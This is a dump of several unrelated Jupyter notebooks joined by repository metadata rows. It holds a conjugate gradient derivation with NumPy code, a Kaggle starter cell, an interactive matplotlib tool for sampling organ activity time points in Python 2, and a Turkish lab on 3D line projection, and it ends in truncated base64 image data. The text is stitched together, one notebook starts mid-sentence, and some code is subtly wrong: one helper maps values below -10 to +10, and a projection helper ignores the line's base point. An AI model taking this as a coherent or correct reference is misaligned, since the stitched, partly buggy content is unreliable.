# The rule for $x_k$ in conjugate gradients is that the residual $r_k = b-Ax_k$ should be orthogonal to all vectors in $\mathcal{K}_k$. Since $r_k$ will be in $\mathcal{K}_{k+1}$, it must be a multiple of Arnoldi's next vector $q_{k+1}$. Each residual is therefore orthogonal to all previous residuals.
#
# $$\left.\begin{array}{ll}
# r_k \perp v,v\in\mathcal{K}_{k}\\
# r_k\in \mathcal{K}_{k+1}\\
# q_{k+1}\text{ is the orthonormal vector of } \mathcal{K}_{k+1}
# \end{array}\right\}\Rightarrow \bbox[#fff0e0]{r_{k} \propto q_{k+1}}
# \Rightarrow r_i^Tr_k = 0\text{ for } i<k \tag{11}$$
#
# The vector $x_i$ is in the subspace $\mathcal{K}_i$, the vector $x_{i-1}$ is in the subspace $\mathcal{K}_{i-1}$. Their difference is therefore in the subspace $\mathcal{K}_{i}$. $r_{k-1}$, $r_{k}$ and their difference $r_{k}-r_{k-1}$ is orthogonal to the subspace $\mathcal{K}_{i}$ for $i<k$.
#
# $$\left.\begin{array}{ll}
# x_i-x_{i-1} \in \mathcal{K}_{i}\\
# r_k-r_{k-1} \perp \mathcal{K}_{i}\\
# \end{array}\right\}\Rightarrow \bbox[#fff0e0]{(x_i-x_{i-1})^T(r_{k}-r_{k-1})=0 \quad \text{ for } i<k} \tag{12}$$
#
# We can transfer the difference of residuals to
#
# $$\bbox[#fff0e0]{r_k-r_{k-1}} = (b-Ax_k)-(b-Ax_{k-1}) = \bbox[#fff0e0]{-A(x_k-x_{k-1})} \tag{13}$$
#
# Substituting this equation into the orthogonal equation, we obtain.
#
# $$(x_i-x_{i-1})^TA(x_k-x_{k-1}) = 0 \quad \text{ for }i<k \tag{14}$$
#
# If we use the notation $d_k$ to denote the direction from $x_{k-1}$ to $x_k$, the orthogonal equation becomes
#
# $$\alpha_i d_i^TA \alpha_k d_k=0 \quad \text{ for }i<k \tag{15}$$
#
# where $\alpha$ is the non-zero weights of these directions. Then we obtain the A-orthogonal or conjugate expression.
#
# $$\bbox[#fff0e0]{d_i^TAd_k=0 \quad \text{ for }i<k} \tag{16}$$
#
# And because $A$ is symmetric, the A-orthogonal expression becomes
#
# $$\left.\begin{array}{ll}
# d_i^TAd_k=0 &\text{ for }i<k\\
# (d_i^T A d_k)^T = d_k^T A d_i =0 &\text{ for } i<k
# \end{array}\right\}
# \Rightarrow \bbox[#fff0e0]{d_i^T A d_k = 0 \quad \text{ for } i\neq k} \tag{17}$$
#
# ## Determine the search directions
#
# From the table above, we find that
# - the direction $d_{i+1}$ is in the subspace $\mathcal{K}_{i+1}$,
# - $r_i$ is in $\mathcal{K}_{i+1}$,
# - $d_1,d_2,\cdots, d_i$ is in the subspace $\mathcal{K}_1,\mathcal{K}_2,\cdots, \mathcal{K}_i$ respectively.
#
# Thus any chosen $d_{i+1}$ can be achieved by the linear combination of $r_{i}$ and $d_1,d_2,\cdots, d_i$.
#
# $$d_{i+1} = r_i + \sum_{k=1}^{i}\beta_{i+1, k}d_k \tag{18}$$
#
# Both sides of the equation multiply by $Ad_j$ in, we obtain
#
# $$\begin{align*}
# d_{i+1}^TAd_j &= r_{i}^TAd_j + \sum_{k=1}^{i}\beta_{i+1, k}d_{k}^TA d_{j}\\
# &= r_i^T \frac{1}{\alpha_j}(r_j-r_{j-1}) + \sum_{k=1}^{i}\beta_{i+1,k}d_{k}^T A d_j\\
# &= \frac{1}{\alpha_j}r_i^T r_j-\frac{1}{\alpha_j}r_i^T r_{j-1} + \sum_{k=1}^{i}\beta_{i+1,k}d_k^T A d_j \tag{19}
# \end{align*}$$
#
# There are 4 conditions
# $$\left.\begin{array}{ll}
# \text{if } &j>i+1 &0 &=0-0+0\\
# \text{if } &j=i+1 &d_{i+1}^TAd_{i+1} &= 0 - \frac{1}{\alpha_{i+1}}r_i^T r_i + 0\\
# \text{if } &j=i &0 &= \frac{1}{\alpha_i}r_i^T r_i - 0 + \beta_{i+1, i}d_{i}^T A d_{i}\\
# \text{if } &j<i &0 &= 0 - 0 + \beta_{i+1, j}d_j^T A d_j
# \end{array}\right\}
# \Rightarrow
# \left\{\begin{array}{ll}
# \beta_{i+1,i} = \frac{r_i^T r_i}{d_i^T A d_i} = \frac{r_i^T r_i}{r_{i-1}^T r_{i-1}}\\
# \beta_{i+1, j} = 0\qquad \forall j<i
# \end{array}\right. \tag{20}$$
#
# where we have used two means to eliminate the zero terms.
# - From the conjugate gradients definition, the residual in different iterations are orthogonal to each other, thus $r_i^T r_j = 0$ for $i\neq j$.
# - The A-orthogonal terms is zero, i.e. $d_i A d_j = 0$ for $i\neq j$.
#
# And the result is inspiring, because when we compute $d_{i+1}$, only the coefficient of $d_i$ is non-zero, there is only one $\beta$ we need to evaluate. As a result, the direction takes the form as follows
#
# $$d_{i+1} = r_{i} + \beta_{i+1} d_{i}\qquad \text{where}\quad \beta_{i+1} = \frac{r_{i}^Tr_{i}}{r_{i-1}^Tr_{i-1}} \tag{21}$$
#
#
# ## Determine the search distances
#
# To prove that this procedure really does compute $x$ in $n$ steps, express the error term as a linear combination of search directions; namely
#
# $$
# e_0 = \sum_{j=1}^{n}\delta_{j}d_j \tag{22}
# $$
#
# The values of $\delta_j$ can be found by a mathematical trick. Because the search directions are derive from Krylov subspaces, they are therefore $A$-orthogonal, it is possible to eliminate all the $\delta_j$ values from Expression 22 by premultiplying the expression by $d_k^TA$
#
# $$\begin{align*}
# d_k^T A e_0 &= \sum_j \delta_jd_k^TAd_j\\
# &=\delta_kd_k^TAd_k \qquad (\text{by A-orthogonality of d vectors})\\
# \Rightarrow \delta_k &=\frac{d_k^TAe_0}{d_k^TAd_k}\\
# &=\frac{d_k^TA(e_0+\sum_{i=1}^{k-1}\alpha_i d_i)}{d_k^TAd_k} \qquad (\text{by A-orthogonality of d vectors})\\
# &=\frac{d_k^TAe_{k-1}}{d_k^TAd_k} \tag{23}
# \end{align*}$$
#
# By Equation (8), we find that $a_i = -\delta_i$. After $n$ iteration,
#
# $$x_n = x_0 + \sum_{j=1}^{n}\alpha_jd_j= x_0 - \sum_{j=1}^{n}\delta_jd_j = x_0-e_0 = x \tag{24}$$
#
# The proof is complete.
#
# And with the definition and achieved results we can write $\alpha$ in a new form
#
# $$\left.\begin{array}{ll}
# r_k = Ae_k\\
# d_k = r_{k-1} + \beta_k d_{k-1}\\
# \alpha_k = -\delta_k = -\frac{d_k^TAe_{k-1}}{d_k^TAd_k}
# \end{array}\right\}\Rightarrow \alpha_k = -\frac{(r_{k-1}+\beta d_{k-1})^T r_{k-1}}{d_{k}^T A d_{k}} = -\frac{r_{k-1}^T r_{k-1}}{d_k^T A d_k} \tag{25}$$
#
# ## Conclusion
#
# The procedure of Conjugate gradient method is as follows
#
# Initially, we should set the start point $x_0 = 0$, the residual $r_0 = b - Ax_0$ and the first search diretion $d_1 = b$. Then we can go through the following procedure to estimate $x$ iteratively.
#
# |Step|Pseudocode|Description| Equation |
# |----|----------|-----------|----------|
# |<img width=30/>|<img width=200/>|<img width=200/>|<img width=30/>|
# |1| $\alpha_k = r_{k-1}^T r_{k-1}/d_{k}^T A d_{k}$ | Step length to next $x_k$ | (25) |
# |2| $x_k = x_{k-1} + \alpha_k d_{k}$ | Approximate solution | (8) |
# |3| $r_k = r_{k-1} - \alpha_k A d_k$ | New residual | (13) |
# |4| $\beta_{k+1} = r_k^T r_k/ r_{k-1}^T r_{k-1}$ | Weight of $d_k$ for next direction | (21) |
# |5| $d_{k+1} = r_k + \beta_{k+1}d_k$ | Next search direction | (21) |
#
#
#
# *More detail such as convergence of these methods can be found in <a href='https://www.cs.cmu.edu/~quake-papers/painless-conjugate-gradient.pdf'>An Introduction to the Conjugate Gradient Method Without the Agonizing Pain</a>*
# +
import matplotlib.pyplot as plt
import numpy as np
A = np.array([[3, 1],
[1, 1]])
b = np.array([3.5, 2])
def conjugate_gradient(A, b, x):
r = b - (A@x)
d = b
route = np.copy(x)
for i in range(len(b)):
denominator = d @ A @ d
numerator = r @ r
if denominator == 0:
print(d)
print(A)
print(r)
print(route)
raise Exception("conjugate gradient denominator zero")
alpha = numerator/denominator
x = x + alpha * d
rr = r
r = r - alpha * A @ d
# direction of next iteration
beta = (r @ r)/(rr @ rr)
d = r + beta * d
route = np.vstack((route, x))
return route
def steepest_descent(A, b, x):
r = b - A @ x
route = np.copy(x)
while np.sqrt(np.sum(r**2)) > 1e-8:
# line search
a = (r @ r)/(r @ A @ r)
x = x + a*r
r = b - A @ x
#print(r)
route = np.vstack((route, x))
return route
def draw_contour(ax):
X, Y = np.mgrid[0:2:20j, 0:2:20j]
x = X.reshape(1, -1)
y = Y.reshape(1, -1)
U = np.vstack((x, y))
Z = 1/2 * np.sum(U.T * (A @ U).T, axis=1) - (b @ U)
Z = Z.reshape(X.shape)
ax.contour(X, Y, Z)
return
def draw_route(ax, route):
x, y = route.T[:]
ax.plot(x, y)
def main():
fig = plt.figure(figsize=(11,5), dpi=60)
ax1 = fig.add_subplot(1,2,1)
ax2 = fig.add_subplot(1,2,2)
print(np.linalg.solve(A, b))
x0 = np.array([0, 0])
route1 = conjugate_gradient(A, b, x0)
draw_contour(ax1)
draw_route(ax1, route1)
route2 = steepest_descent(A, b, x0)
draw_contour(ax2)
draw_route(ax2, route2)
if __name__=="__main__":
main()
| 14,367 |
/datasets/text-normalization-challenge-english-language/kernels/NULL---schrodingirl---kaggle-go-go-first-attempt.ipynb
|
7d191d6f571791f1b4e9d3155b547ed506df14ac
|
[] |
no_license
|
mindis/GDS
|
https://github.com/mindis/GDS
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,344 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _cell_guid="36951b37-28bf-48dd-b176-49028333fa75" _uuid="06d4a7301c478f7237c9386507e5eb3319d914c0"
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
contains only one cell. Run it.
#
# Follow the instructions on the interactive window, in short:
#
# 1 Select the time points to be included in the calculation.
# 2 Select up to six paralel time series
# 3 Click "Draw map"
#
# TODO: Revert the function so tiles gets de-selected also
# TODO: General aethetics
# +
# %matplotlib
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#import scipy.io
#from itertools import product
from matplotlib.patches import RegularPolygon
import seaborn as sns
from matplotlib.ticker import FuncFormatter
from scipy.optimize import curve_fit
#TODO: Documentation
def integrate_box_and_tail(t_series, a_series):
# First the initial box
box_area = t_series[0]*a_series[0]
# Now the trapezoid
I = 0
for i in range(0, len(a_series)-2):
I = I + ((a_series[i] + a_series[i + 1])/2)*(t_series[i+1]-t_series[i])
A = box_area + I
# Last the last two points, use exponential 'fit' from two points
lam = (np.log(a_series[-1])-np.log(a_series[-2]))/(t_series[-1]-t_series[-2])
T = a_series[-2]/lam*-1
A = A + T
return A
def return_diff_full_and_reduced(t_series, a_series, red_log_vector, is_wb = False):
I_full = integrate_box_and_tail(t_series, a_series)
index_delete = np.where(red_log_vector == 0)[0]
t_red = np.delete(t_series, index_delete)
a_red = np.delete(a_series, index_delete)
if len(a_red) < 3 or len(t_red) < 3:
print "Warning - series is too short, default to none"
return None
if is_wb:
if sum(red_log_vector) == 2 or sum(red_log_vector) == 3:
initial = np.array([1000,-0.001])
popt_red, pcov_red = curve_fit(exp_func, t_red, a_red, p0 = initial)
else:
popt_red, pcov_red = curve_fit(exp_func, t_red, a_red)
popt, pcov = curve_fit(exp_func, t_series, a_series)
I_full = a_series[0]/popt[1]
I_red = a_series[0]/popt_red[1]
diff = (I_red-I_full)/I_full
else:
I_red = integrate_box_and_tail(t_red, a_red)
diff = (I_red-I_full)/I_full
return diff
def return_cut_string(glob_string, red_log_vector):
index_delete = np.where(red_log_vector == 0)[0]
glob_string_red = np.delete(glob_string, index_delete)
return glob_string_red
def load_arm1_data(file_name):
curve_data = pd.read_pickle(file_name)
arm1_data = curve_data[0:4]
return arm1_data
def exp_func(x, a, b):
return a*np.exp(-b*x)
def find_largest_error(data, organ, log_array):
"""Function to return the largest array for a given organ for a
given set of removed time points given by the @log_array"""
error_vector = np.ones(4)
if organ == 'WB':
do_wb = True
else:
do_wb = False
for i in range(4):
t_vec = data['Time'][i]
a_vec = data[organ][i]
error_vector[i] = return_diff_full_and_reduced(t_vec, a_vec, log_array, is_wb=do_wb)
#print error_vector
larges_error = max(np.min(error_vector), np.max(error_vector), key = abs)
return larges_error
def construct_error_matrix(data, cut_matrix):
"""
Should return the largest error for six different cut vectors for all
pre-defined organs
"""
error_matrix = np.zeros([6,4])
organ_names = ['Liver', 'Spleen', 'Kidney', 'WB']
for j in range(4):
for i in range(6):
cut_vec = cut_matrix[i,:]
largest_organ_error = find_largest_error(data, organ_names[j], cut_vec)
error_matrix[i,j] = largest_organ_error
return error_matrix*100
def render_heatmap(error_matrix, cut_matrix = 0):
"""Function to render the heat map from the error matrix"""
copy = error_matrix
chararray = error_matrix_to_annot(error_matrix)
y_label = cut_points_string_from_matrix(cut_matrix)
x_label = ['Liver', 'Spleen', 'Kidney', 'WB']
fig = plt.figure()
g = sns.heatmap(error_matrix,
annot=chararray,
fmt='',
cbar = False,
square=True,
vmax = 10,
vmin = -10,
yticklabels = y_label,
xticklabels = x_label,
)
g.set_yticklabels(g.get_yticklabels(), rotation = 0)
return fig
def error_matrix_to_annot(error_matrix):
"""Utility function to convert the error function into
a matrix of strings that can be read by sns.heatmap"""
error_matrix[error_matrix > 10] = 10
error_matrix[error_matrix < -10] = 10
# Start of magic
string_arr = pd.DataFrame(error_matrix/100).applymap(lambda x: '{:.1%}'.format(x)).values
string_arr[string_arr == '10.0%'] = '>10%'
# End of magic DO NOT TOUCH!
return string_arr
def cut_points_string_from_matrix(cut_matrix):
""" Utility function that handles the legend of the heatmap
First assume that we have six different time points containing
six possible time points each
"""
glob_time = np.array(['2,', '4,', '8,', '24,', '96,', '168 '])
time_cuts = []
for i in range(6):
cut_line = cut_matrix[i,:]
I = [cut_line == 1]
string_time = str(glob_time[I])
string_time = string_time.replace("'", "")
#string_time = string_time.replace("[", "")
#string_time = string_time.replace("]", "")
time_cuts.append(string_time)
return time_cuts
def on_click(event):
#print "pressed"
#print len(polygons)
if polygon_draw.contains_point((event.x, event.y)):
cut_matrix = np.flipud(logical_back) # TODO: Strange...
error_matrix = construct_error_matrix(data, cut_matrix)
print error_matrix
render_heatmap(error_matrix, cut_matrix)
if polygon_restart.contains_point((event.x, event.y)):
print "Restarting..."
plt.clf()
for i in range(0, 36): # TODO: Remove magic number...
curr_pol = polygons[i]
if curr_pol.contains_point((event.x, event.y)):
curr_pol.set_facecolor('#404040')
curr_pol_ind = poly_inds[i]
logical_back[curr_pol_ind[1], curr_pol_ind[0]] = 1
fig.canvas.draw()
P_num = ['P1', 'P2', 'P3', 'P5']
Inj_act = [1102, 1036, 746, 1982]
Time = [np.array([2.5, 4.29999, 8.23334, 19.7833, 94.2, 168.1]),
np.array([2.75, 4.25, 8.2, 20.65, 100.583, 189.733]),
np.array([2.5, 4.23334, 8.09998, 20.2833, 98.7, 171.317]),
np.array([2.25, 3.99998, 7.63332, 20.4667, 98.2833, 170.25])]
Liver = [np.array([108.770512, 112.38991897, 116.31435356, 104.30149178, 63.3970276, 34.28450106]),
np.array([107.33164239, 110.76314063, 111.41093599, 107.82613686, 80.06103286, 41.37089202]),
np.array([63.47309292, 63.66233913, 58.74609277, 57.19409426, 49.70220657, 29.98779343]),
np.array([199.88476722, 201.98137149, 209.83657957, 212.59886244, 154.76056338, 87.77230047])]
Spleen = [np.array([34.11104195, 34.96826027, 42.38488655, 50.65711356, 39.5992569, 20.78874735]),
np.array([28.63080662, 27.76166367, 30.34939042, 32.8279405, 28.99061033, 15.96244131]),
np.array([6.89295301, 6.1512036, 4.40919565, 8.94284371, 9.30892019, 6.91267606]),
np.array([24.08050666, 41.05687556, 31.69589562, 45.60926242, 43.58920188, 32.15492958])]
Kidney = [np.array([6.83737549, 6.34075983, 6.22321691, 6.25137427, 2.75423567, 1.3093482]),
np.array([5.01502796, 5.04874878, 4.83993533, 5.1855283, 2.75384977, 1.21965399]),
np.array([4.59038279, 4.53452984, 4.50516336, 4.61176031, 2.73732394, 1.67199202]),
np.array([13.88433109, 13.81154029, 14.20934367, 14.36329703, 7.38638498, 3.44148545])]
WB = [np.array([1102.0, 1080.134096, 1048.26459865, 976.87715549, 449.40147401, 223.14593731]),
np.array([1036.0, 1013.16240137, 976.59289097, 902.0819552, 517.39699551, 202.29620158]),
np.array([746.0, 728.09661667, 706.99680365, 656.26798142, 385.87161274, 198.94434538]),
np.array([1982.0, 1945.99382361, 1899.50546373, 1752.1932018, 979.75787886, 505.23959224])]
d = {'P_num': P_num,
'Inj_act': Inj_act,
'Time': Time,
'Liver':Liver,
'Spleen': Spleen,
'Kidney': Kidney,
'WB': WB}
df = pd.DataFrame(data = d)
#
#
# End of data definition
#
#
# TODO: Documentation
data = df
size_factor_x = 20
size_factor_y = 20
num_row = 6
num_cols = 6
logical_back = np.zeros([num_row, num_cols])
fig = plt.figure(figsize = ((size_factor_y + 2) / 4., (size_factor_x + 2) / 3.))
ax = fig.add_axes((0.05, 0.05, 0.9, 0.9), aspect = 'equal', frameon = False,
xlim = (-0.05, size_factor_y + 0.05),
ylim = (-0.05, size_factor_x + 0.05))
for axies in (ax.xaxis, ax.yaxis):
axies.set_major_formatter(plt.NullFormatter())
axies.set_major_formatter(plt.NullFormatter())
polygon_draw = plt.Polygon([[15,7], [15,11], [17,11], [17,7],[15,7]], closed = True, fc = '#202020')
polygon_restart = plt.Polygon([[15,7+6], [15,11+6], [17,11+6], [17,7+6],[15,7+6]], closed = True, fc = '#902020')
polygon_draw.set_picker(True)
ax.add_patch(polygon_draw)
ax.add_patch(polygon_restart)
x_0 = 2
y_0 = 7
L = 2
S = 2
x_ind = 0
y_ind = 0
polygons = []
poly_inds = []
glob_time = ['2 h', '4 h', '8 h', '24 h', '96 h', '168 h']
for i in range(0,num_cols):
for j in range(0, num_row):
polygon_1 = plt.Polygon([[x_0, y_0],
[x_0,y_0 + L],
[x_0 + L,y_0 + L],
[x_0 + L,y_0],
[x_0,y_0]],
fc = 'white',
ec = 'black')
y_0 = y_0 + S
ax.add_patch(polygon_1)
polygons.append(polygon_1)
poly_ind = (x_ind, y_ind)
poly_inds.append(poly_ind)
y_ind = y_ind + 1
x_ind = x_ind + 1
y_0 = 7
y_ind = 0
x_0 = x_0 + S
text_hrs_space = 1.8
for num_time in range(0, len(glob_time)):
ax.text(2.7 + num_time*text_hrs_space,num_row*3.2 + 0.2, glob_time[num_time])
ax.text(17.5,8.5,"Draw map")
ax.text(17.5,14.5, "Quit")
ax.text(2, 2, " Simulate a calculation with a reduced \n number of time points \n\n Select time points by clicking the squares\n\n Show result by clicking \"Draw map\" ")
foo = fig.canvas.mpl_connect('button_press_event', on_click)
| 11,649 |
/H.Geo+5.Hafta+Çarşamba+Lab.ipynb
|
a8f5cb0bf9023fd2223c7aeb4c2498586e8623c0
|
[] |
no_license
|
nefisebanu/Hesaplamali-Geometri
|
https://github.com/nefisebanu/Hesaplamali-Geometri
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 106,289 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
def draw_my_line(normal_vector,point_on_line):
a=normal_vector[0]
b=normal_vector[1]
c=normal_vector[2]
x_0=point_on_line[0]
y_0=point_on_line[1]
z_0=point_on_line[2]
x=[]
y=[]
z=[]
for t in range (-1,10):
x.append(x_0+t*a)
y.append(y_0+t*b)
z.append(z_0+t*c)
return (x,y,z)
def my_scalar_product(a,b):
#a transpose b ?
a_t_b= a[0]*b[0]+a[1]*b[1]+a[2]*b[2]
return a_t_b
def point_on_line(normal_vector,point_on_line,other_point):
a_x=other_point[0]-point_on_line[0] #other point pointOnLine ikilisi
a_y=other_point[1]-point_on_line[1]
a_z=other_point[2]-point_on_line[2]
b=[a_x,a_y,a_z]
a=normal_vector
c=my_scalar_product(a,b)/my_scalar_product(a,a)
b_x=c*a[0]
b_y=c*a[1]
b_z=c*a[2]
nearest_point_on_line=[b_x,b_y,b_z]
return nearest_point_on_line
# +
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
# %matplotlib notebook
p=(0,0,0) #hattı tanımlayan 2 parametre
n=(1,1,1)
other_point=[1,2,7] #bekleme noktası
n_p=point_on_line(n,p,other_point) # n_p değeri hat üzerindeki bize en yakın nokta
points=draw_my_line(n,p)
ax=plt.axes(projection='3d')
ax.plot3D(points[0],points[1],points[2],'pink')
ax.scatter(other_point[0],other_point[1],other_point[2],'*')
ax.scatter(n_p[0],n_p[1],n_p[2],'*')
plt.show()
# -
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